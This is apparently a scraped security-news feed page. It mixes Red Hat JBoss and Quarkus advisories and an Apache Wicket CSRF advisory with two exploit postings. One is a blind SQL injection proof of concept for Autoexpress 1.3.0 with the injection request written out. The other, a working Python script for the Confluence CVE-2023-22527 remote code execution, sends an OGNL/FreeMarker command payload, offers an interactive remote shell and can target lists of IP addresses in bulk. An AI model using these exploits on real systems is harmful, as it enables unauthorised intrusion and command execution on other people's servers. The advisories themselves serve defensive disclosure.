Tramyardg Autoexpress version 1.3.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: tramyardg autoexpress - SQL Injection# Google Dork: N/A# Date: 11/28/2023# Exploit Author: Scott White# Vendor Homepage: https://github.com/tramyardg/autoexpress# Version: v1.3.0# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52# CVE : CVE-2023-48901# References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48901https://www.cve.org/CVERecord?id=CVE-2023-48901# Description:Autoexpress 1.3.0 allows SQL Injection via parameter 'carId' in /autoexpress/details.php and /autoexpress/admin/inventory.php. This vulnerability allows remote attackers to disclose sensitive information on affected installations.# Proof of Concept:+ Go to "http://localhost/autoexpress/admin/sign-in.php"+ Sign in with Admin credentials+ Click "Manage Inventory" --> "Actions" --> "Manage Photos" while having the "Intercept On" Burp Suite+ Should receive a request of POST - /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=[ID]+ Send it to Repeater+ Captured Burp Request:POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3 HTTP/1.1Host: localhostContent-Length: 0Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestOrigin: http://localhostReferer: http://localhost/autoexpress/admin/inventory.php?username=adminAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=PHPSESSIONIDConnection: close# Sample RequestPOST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3+and+(ascii(substring((select+version()),1,1)))+%3d+56 HTTP/1.1Host: localhostContent-Length: 0Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestOrigin: http://localhostReferer: http://localhost/autoexpress/admin/inventory.php?username=adminAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=PHPSESSIONIDConnection: close

Tramyardg Autoexpress 1.3.0 SQL Injection

Red Hat Security Advisory 2024-1325-03 - Red Hat JBoss Web Server 6.0.1 zip release is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include HTTP request smuggling, denial of service, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1325.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 6.0.1 release and security updateAdvisory ID:        RHSA-2024:1325-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1325Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: Red Hat JBoss Web Server 6.0.1 zip release is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 6.0.1 serves as a replacement for Red Hat JBoss Web Server 6.0.0. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=6.0https://bugzilla.redhat.com/show_bug.cgi?id=2235370https://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1325-03

Red Hat Security Advisory 2024-1324-03 - An update is now available for Red Hat JBoss Web Server 6.0.1 on Red Hat Enterprise Linux versions 8 and 9. Issues addressed include HTTP request smuggling, denial of service, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1324.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 6.0.1 release and security updateAdvisory ID:        RHSA-2024:1324-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1324Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-41080====================================================================Summary: An update is now available for Red Hat JBoss Web Server 6.0.1 on Red Hat Enterprise Linux versions 8 and 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 6.0.1 serves as a replacement for Red Hat JBoss Web Server 6.0.0. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-41080References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2235370https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1324-03

Red Hat Security Advisory 2024-1319-03 - Red Hat JBoss Web Server 5.7.8 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1319.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 5.7.8 release and security updateAdvisory ID:        RHSA-2024:1319-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1319Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: Red Hat JBoss Web Server 5.7.8 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.8 serves as a replacement for Red Hat JBoss Web Server 5.7.7. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=5.7https://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1319-03

Red Hat Security Advisory 2024-1318-03 - An update is now available for Red Hat JBoss Web Server 5.7.8 on Red Hat Enterprise Linux versions 7, 8, and 9. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1318.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 5.7.8 release and security updateAdvisory ID:        RHSA-2024:1318-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1318Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: An update is now available for Red Hat JBoss Web Server 5.7.8 on Red Hat Enterprise Linux versions 7, 8, and 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.8 serves as a replacement for Red Hat JBoss Web Server 5.7.7. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)* tomcat: : Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1318-03

Red Hat Security Advisory 2024-1317-03 - Red Hat JBoss Core Services Apache HTTP Server 2.4.57 Service Pack 3 is now available. Issues addressed include buffer overflow, cross site scripting, information leakage, out of bounds read, and use-after-free vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1317.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.57 SP3 security updateAdvisory ID:        RHSA-2024:1317-03Product:            Red Hat JBoss Core ServicesAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1317Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: Red Hat JBoss Core Services Apache HTTP Server 2.4.57 Service Pack 3 is now available.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products and packaged under Red Hat JBoss Core Services, to allow for faster distribution of updates and for a more consistent update experience.This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.57 Service Pack 3 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.57 Service Pack 2, and includes bug fixes and enhancements, which are documented in the Release Notes linked to in the References section.Security Fix(es):* curl: information disclosure by exploiting a mixed case flaw (CVE-2023-46218)* curl: excessively long file name may lead to unknown HSTS status (CVE-2023-46219)* httpd: mod_macro: out-of-bounds read vulnerability (CVE-2023-31122)* jbcs-httpd24-mod_proxy_cluster: mod_cluster/mod_proxy_cluster: Stored Cross site Scripting (CVE-2023-6710)* jbcs-httpd24-openssl: openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)* libxml2: crafted xml can cause global buffer overflow (CVE-2023-39615)* libxml2: use-after-free in XMLReader (CVE-2024-25062)A Red Hat Security Bulletin which addresses further details about this flaw is available in the References section.For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2235864https://bugzilla.redhat.com/show_bug.cgi?id=2245332https://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252030https://bugzilla.redhat.com/show_bug.cgi?id=2252034https://bugzilla.redhat.com/show_bug.cgi?id=2254128https://bugzilla.redhat.com/show_bug.cgi?id=2262726

Red Hat Security Advisory 2024-1317-03

Red Hat Security Advisory 2024-1316-03 - Red Hat JBoss Core Services Apache HTTP Server 2.4.57 Service Pack 3 is now available. Issues addressed include cross site scripting, information leakage, and out of bounds read vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1316.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.57 SP3 security updateAdvisory ID:        RHSA-2024:1316-03Product:            Red Hat JBoss Core ServicesAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1316Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2023-5678====================================================================Summary: Red Hat JBoss Core Services Apache HTTP Server 2.4.57 Service Pack 3 is nowavailable.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products and packaged under Red Hat JBoss Core Services, to allow for faster distribution of updates and for a more consistent update experience.This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.57 Service Pack 3 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.57 Service Pack 2, and includes bug fixes and enhancements, which are documented in the Release Notes linked to in the References section.Security Fix(es):* curl: information disclosure by exploiting a mixed case flaw (CVE-2023-46218)* curl: excessively long file name may lead to unknown HSTS status (CVE-2023-46219)* httpd: mod_macro: out-of-bounds read vulnerability (CVE-2023-31122)* jbcs-httpd24-mod_proxy_cluster: mod_cluster/mod_proxy_cluster: Stored Cross site Scripting (CVE-2023-6710)* jbcs-httpd24-openssl: openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)A Red Hat Security Bulletin which addresses further details about this flaw is available in the References section.For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2245332https://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252030https://bugzilla.redhat.com/show_bug.cgi?id=2252034https://bugzilla.redhat.com/show_bug.cgi?id=2254128

Red Hat Security Advisory 2024-1316-03

Red Hat Security Advisory 2024-0722-03 - An update is now available for Red Hat build of Quarkus. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0722.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat build of Quarkus 3.2.10 release and security update  
Advisory ID:        RHSA-2024:0722-03  
Product:            Red Hat build of Quarkus  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0722  
Issue date:         2024-03-18  
Revision:           03  
CVE Names:          CVE-2023-4043  
====================================================================

Summary: 

An update is now available for Red Hat build of Quarkus.

Red Hat Product Security has rated this update as having a security impact of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives  
a  
detailed severity rating, is available for each vulnerability. For more  
information, see the CVE links in the References section.

Description:

This release of Red Hat build of Quarkus 3.2.10 includes security updates,  
bug fixes, and enhancements. For more information, see the release notes page  
listed in the References section.

Security Fix(es):

* CVE-2023-22102 mysql/mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2023) [quarkus-3.2]

* CVE-2023-48795 org.apache.sshd/sshd-core: ssh: Prefix truncation attack on Binary Packet Protocol (BPP) [quarkus-3.2]

* CVE-2023-4043 org.eclipse.parsson/parsson: Denial of Service due to large number parsing [quarkus-3.2]

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-4043

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_build_of_quarkus/3.2/  
https://access.redhat.com/articles/4966181  
https://bugzilla.redhat.com/show_bug.cgi?id=2254210  
https://bugzilla.redhat.com/show_bug.cgi?id=2254594  
https://bugzilla.redhat.com/show_bug.cgi?id=2256474  
https://issues.redhat.com/browse/QUARKUS-3791  
https://issues.redhat.com/browse/QUARKUS-3851  
https://issues.redhat.com/browse/QUARKUS-3938  
https://issues.redhat.com/browse/QUARKUS-3939  
https://issues.redhat.com/browse/QUARKUS-3940  
https://issues.redhat.com/browse/QUARKUS-3941  
https://issues.redhat.com/browse/QUARKUS-3942  
https://issues.redhat.com/browse/QUARKUS-3943  
https://issues.redhat.com/browse/QUARKUS-3944  
https://issues.redhat.com/browse/QUARKUS-3945  
https://issues.redhat.com/browse/QUARKUS-3946  
https://issues.redhat.com/browse/QUARKUS-3947  
https://issues.redhat.com/browse/QUARKUS-3948  
https://issues.redhat.com/browse/QUARKUS-3949  
https://issues.redhat.com/browse/QUARKUS-3950  
https://issues.redhat.com/browse/QUARKUS-3951  
https://issues.redhat.com/browse/QUARKUS-3952  
https://issues.redhat.com/browse/QUARKUS-3953  
https://issues.redhat.com/browse/QUARKUS-3954  
https://issues.redhat.com/browse/QUARKUS-3955  
https://issues.redhat.com/browse/QUARKUS-3956  
https://issues.redhat.com/browse/QUARKUS-3957  
https://issues.redhat.com/browse/QUARKUS-3958  
https://issues.redhat.com/browse/QUARKUS-3959  
https://issues.redhat.com/browse/QUARKUS-3960  
https://issues.redhat.com/browse/QUARKUS-3961  
https://issues.redhat.com/browse/QUARKUS-3963  
https://issues.redhat.com/browse/QUARKUS-3964

Red Hat Security Advisory 2024-0722-03

Atlassian Confluence versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, and 8.5.0 through 8.5.3 suffer from a remote code execution vulnerability.

    # Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability# Date: 25/1/2024# Exploit Author: MaanVader# Vendor Homepage: https://www.atlassian.com/software/confluence# Software Link: https://www.atlassian.com/software/confluence# Version:  8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3# Tested on: 8.5.3# CVE : CVE-2023-22527import requestsimport argparseimport urllib3from prompt_toolkit import PromptSessionfrom prompt_toolkit.formatted_text import HTMLfrom rich.console import Console# Disable SSL warningsurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# Argument parsingparser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")parser.add_argument("-u", "--url", help="Single Confluence Server URL")parser.add_argument("-f", "--file", help="File containing list of IP addresses")parser.add_argument("-c", "--command", help="Command to Execute")parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")args = parser.parse_args()# Rich console for formatted outputconsole = Console()# Function to send payloaddef send_payload(url, command):    headers = {        'Connection': 'close',        'Content-Type': 'application/x-www-form-urlencoded'    }    payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'                      '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')    headers['Content-Length'] = str(len(payload))        full_url = f"{url}/template/aui/text-inline.vm"    response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)    return response.text.split('<!DOCTYPE html>')[0].strip()# Interactive shell functiondef interactive_shell(url):    session = PromptSession()    console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")    while True:        try:            cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))            if cmd.lower() in ["exit", "quit"]:                break            response = send_payload(url, cmd)            console.print(response)        except KeyboardInterrupt:            break        except Exception as e:            console.print(f"[bold red]Error: {e}[/bold red]")            break# Process file functiondef process_file(file_path):    with open(file_path, 'r') as file:        for line in file:            ip = line.strip()            url = f"http://{ip}:8090"            console.print(f"Processing {url}")            print(send_payload(url, args.command))# Main execution logicif args.shell and args.url:    interactive_shell(args.url)elif args.url and args.command:    print(send_payload(args.url, args.command))elif args.file and args.command:    process_file(args.file)else:    print("Error: Please provide a valid URL and a command or use the interactive shell option.")

Atlassian Confluence 8.5.3 Remote Code Execution

An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket.
This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series.
Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected.

Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-27439

**Cross-Site Request Forgery in Apache Wicket**

Moderate severity GitHub Reviewed Published Mar 19, 2024 to the GitHub Advisory Database • Updated Mar 20, 2024

**Package**

maven org.apache.wicket:wicket (Maven)

**Affected versions**

\>= 9.1.0, < 9.17.0

\>= 10.0.0-M1, < 10.0.0

**Patched versions**

9.17.0

10.0.0

**Description**

Published to the GitHub Advisory Database

Mar 19, 2024

Last updated

Mar 20, 2024

Tag

#apache